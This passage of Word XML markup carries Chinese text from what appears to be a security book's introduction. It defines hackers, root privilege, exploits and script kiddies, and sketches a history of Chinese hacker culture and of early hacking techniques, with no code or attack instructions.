        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”，他们对计算机系统有着深入的理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>解，因此往往能够发现其中的问题。“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Hacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>”在中国按照音译，被称为“黑客”。在计算机安全领域，黑客是一群破坏规则、不喜欢被拘束的人，因此总想着能够找到系统的漏洞，以获得一些规则之外的权力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="151"/>
        <w:ind w:left="203" w:right="131" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>对于现代计算机系统来说，在用户态的最高权限是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>roo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，也是黑客们最渴望</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>能够获取的系统最高权限。“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>”对黑客的吸引，就像大米对老鼠的吸引，美女对色狼的吸引。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="123" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>不想拿到“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>”的黑客，不是好黑客。漏洞利用代码能够帮助黑客们达成这一目标。黑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>客们使用的漏洞利用代码，被称为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”。在黑客的世界里，有的黑客，精通计算机技术，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>能自己挖掘漏洞，并编写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>；而有的黑客，则只对攻击本身感兴趣，对计算机原理和各种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>编程技术的了解比较粗浅，因此只懂得编译别人的代码，自己并没有动手能力，这种黑客被称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>cr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”，即“脚本小子”。在现实世界里，真正造成破坏的，往往并非那些挖掘并研</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>究漏洞的“黑客”们，而是这些脚本小子。而在今天已经形成产业的计算机犯罪、网络犯罪中，   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>造成主要破坏的，也是这些“脚本小子”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250017" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>中国黑客简史</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="448" w:lineRule="auto" w:before="204"/>
        <w:ind w:left="604" w:right="1987"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>中国黑客的发展分为几个阶段，到今天已经形成了一条黑色产业链。笔者把中国黑客的发展分为了：启蒙时代、黄金时代、黑暗时代。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="7"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>首先是启蒙时代，这个时期大概处在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>世纪 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>90 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>年代，此时中国的互联网也刚刚处于起步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>阶段，一些热爱新兴技术的青年受到国外黑客技术的影响，开始研究安全漏洞。启蒙时代的黑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>客们大多是由于个人爱好而走上这条道路，好奇心与求知欲是驱使他们前进的动力，没有任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>利益的瓜葛。这个时期的中国黑客们通过互联网，看到了世界，因此与西方发达国家同期诞生</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="180"/>
      </w:pPr>
      <w:bookmarkStart w:name="1.1.2  黑客技术的发展历程" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的黑客精神是一脉相传的，他们崇尚分享、自由、免费的互联网精神，并热衷于分享自己的最新研究成果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="148"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>接下来是黄金时代，这个时期以中美黑客大战为标志。在这个历史背景下，黑客这个特殊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>的群体一下子几乎吸引了社会的所有眼球，而此时黑客圈子所宣扬的黑客文化以及黑客技术的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>独特魅力也吸引了无数的青少年走上这条道路。自此事件后，各种黑客组织如雨后春笋般冒出。此阶段的中国黑客，其普遍的特点是年轻，有活力，充满激情，但在技术上也许还不够成熟。此时期黑客圈子里贩卖漏洞、恶意软件的现象开始升温，同时因为黑客群体的良莠不齐，也开始出现以赢利为目的的攻击行为，黑色产业链逐渐成型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="148"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>最后是黑暗时代，这个阶段从几年前开始一直延续到今天，也许还将继续下去。在这个时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>期黑客组织也遵循着社会发展规律，优胜劣汰，大多数的黑客组织没有坚持下来。在上一个时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>期非常流行的黑客技术论坛越来越缺乏人气，最终走向没落。所有门户型的漏洞披露站点，也不再公布任何漏洞相关的技术细节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="151"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>伴随着安全产业的发展，黑客的功利性越来越强。黑色产业链开始成熟，这个地下产业每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>年都会给互联网造成数十亿的损失。而在上一个时期技术还不成熟的黑客们，凡是坚持下来的， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>都已经成长为安全领域的高级人才，有的在安全公司贡献着自己的专业技能，有的则带着非常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>强的技术进入了黑色产业。此时期的黑客群体因为互相之间缺失信任已经不再具有开放和分享的精神，最为纯粹的黑客精神实质上已经死亡。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="302" w:lineRule="auto" w:before="149"/>
        <w:ind w:left="203" w:right="125" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>整个互联网笼罩在黑色产业链的阴影之下，每年数十亿的经济损失和数千万的网民受害， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>以及黑客精神的死亡，使得我们没有理由不把此时称为黑暗时代。也许黑客精神所代表的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Free</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Share</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，真的一去不复返了！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250016" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>黑客技术的发展历程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="202"/>
        <w:ind w:left="202" w:right="223" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>从黑客技术发展的角度看，在早期，黑客攻击的目标以系统软件居多。一方面，是由于这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>个时期的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>技术发展还远远不成熟；另一方面，则是因为通过攻击系统软件，黑客们往往能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>够直接获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>oo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>权限。这段时期，涌现出了非常多的经典漏洞以及“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”。比如著名的黑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-23"/>
        </w:rPr>
        <w:t>客组织 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TESO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>，就曾经编写过一个攻击 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>，并公然在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>banner </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中宣称曾经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>利用这个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>入侵过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>cia.gov</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（美国中央情报局</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="156"/>
